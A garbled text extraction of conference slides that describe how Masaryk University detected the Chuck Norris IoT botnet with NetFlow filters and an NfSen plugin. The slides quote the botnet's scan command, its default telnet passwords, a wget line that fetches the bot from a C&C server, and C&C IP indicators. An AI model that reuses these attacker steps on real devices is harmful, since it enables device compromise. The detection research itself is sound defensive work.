View
228
Download
2
Category
Preview:
Citation preview
Detecting Botnetswith NetFlow
V Krmiacuteček T Plesniacutekvojtec|plesnikicsmunicz
FloCon 2011 January 12 Salt Lake City Utah
Presentation Outline
NetFlow Monitoring at MU
Chuck Norris Botnet in a Nutshell
Botnet Detection Methods
NfSen Botnet Detection Plugin
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 2 28
Part I
NetFlow Monitoring at MU
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 3 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Presentation Outline
NetFlow Monitoring at MU
Chuck Norris Botnet in a Nutshell
Botnet Detection Methods
NfSen Botnet Detection Plugin
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 2 28
Part I
NetFlow Monitoring at MU
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 3 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
